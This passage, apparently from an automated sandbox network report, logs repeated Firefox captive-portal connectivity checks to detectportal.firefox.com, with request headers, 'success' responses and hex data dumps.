                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.250294924 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51524
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.279098988 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.603132010 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51525
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:47.283996105 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:47.608423948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51529
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:57.649534941 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.619726896 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.943252087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51540
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.975146055 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:59.298741102 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51541
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:09.349643946 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:09.355395079 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:09.679496050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51551
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:19.739270926 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:20.152729034 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:20.476499081 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51562
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:30.539977074 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:40.752599001 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:50.940287113 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.153318882 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.960232019 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:02.285293102 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51604
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:12.441448927 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:22.648180962 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.335508108 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.658983946 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51673
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:24.010277987 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:24.333972931 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51686
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:16.037595987 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:16.361711025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51798
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.466722965 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.790132999 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:52:58 GMT
                                                                                                                                                                                                                                                                                                            Age: 51848
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: success


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            26192.168.2.45000534.107.221.82805040C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.133549929 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.314713001 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63441
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:19.739521980 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.072979927 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63442
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.438518047 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.771364927 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63443
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.218211889 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.551172018 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63446
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:33.602735996 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.695456028 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.029823065 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63462
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.152585030 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.485650063 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63463
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
